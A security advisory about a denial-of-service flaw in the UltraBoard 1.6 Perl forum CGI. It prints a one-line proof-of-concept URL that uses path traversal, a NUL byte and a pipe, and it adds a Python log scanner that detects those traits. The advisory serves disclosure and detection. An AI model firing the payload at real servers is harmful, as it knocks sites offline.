UltraBoard DoS Vulnerability
BID:1175
Info
| Bugtraq ID: | 1175 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | May 05 2000 12:00AM |
| Updated: | May 05 2000 12:00AM |
| Credit: | Posted to Bugtraq on May 5, 2000 by Juan M. Bello Rivas <[email protected]> |
| Vulnerable: | UltraScripts UltraBoard 1.6 |
| Not Vulnerable: | |
Discussion
UltraBoard 1.6 (and possibly all 1.x versions and the new beta UltraBoard 2000) is vulnerable to this Denial of Service attack.
A remote user can exhaust the web server's available resources by sending a specially crafted request to the CGI. The request causes a fork, which then consumes the server's processor time and memory.
Exploit / POC
http://target/ultraboard.pl?request=Session=../UltraBoard.pl%00%7c
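As an added example (not part of the original advisory), the following Python sketch flags web-server access-log entries whose `Session` value carries the traits visible in the request above: a `../` sequence, an encoded NUL byte, or a pipe character. The log lines, the `/cgi-bin/` path, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample access-log lines (documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/May/2000:10:00:01 +0000] '
    '"GET /cgi-bin/ultraboard.pl?request=Session=a1b2c3d4 HTTP/1.0" 200 5120',
    '192.0.2.66 - - [05/May/2000:10:00:07 +0000] '
    '"GET /cgi-bin/ultraboard.pl?request=Session=../UltraBoard.pl%00%7c HTTP/1.0" 200 0',
    '192.0.2.77 - - [05/May/2000:10:00:09 +0000] '
    '"GET /cgi-bin/UltraBoard.pl?request=Session=..%2FUltraBoard.pl%00%7C HTTP/1.0" 200 0',
    '192.0.2.20 - - [05/May/2000:10:00:12 +0000] '
    '"GET /index.html?q=a%7cb HTTP/1.0" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCRIPT_RE = re.compile(r'/ultraboard\.pl$', re.IGNORECASE)


def session_findings(log_line):
    """Return the sorted suspicious traits found in the Session value, or []."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not SCRIPT_RE.search(url.path):
        return []  # not a request to the board CGI
    # Decode to bytes so %00 survives as a real NUL and %2F/%7C are normalised.
    query = unquote_to_bytes(url.query)
    _, found, session = query.partition(b"Session=")
    if not found:
        return []
    checks = {
        "nul-byte": b"\x00" in session,
        "pipe": b"|" in session,
        "path-traversal": b"../" in session or b"..\\" in session,
    }
    return sorted(name for name, hit in checks.items() if hit)


def scan(lines):
    """Return (client_ip, findings) for every line with at least one finding."""
    return [(line.split()[0], f) for line in lines if (f := session_findings(line))]


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ",".join(findings))
```

The same three checks can serve as a request filter in front of the CGI, since a legitimate session value has no reason to contain any of them.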
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].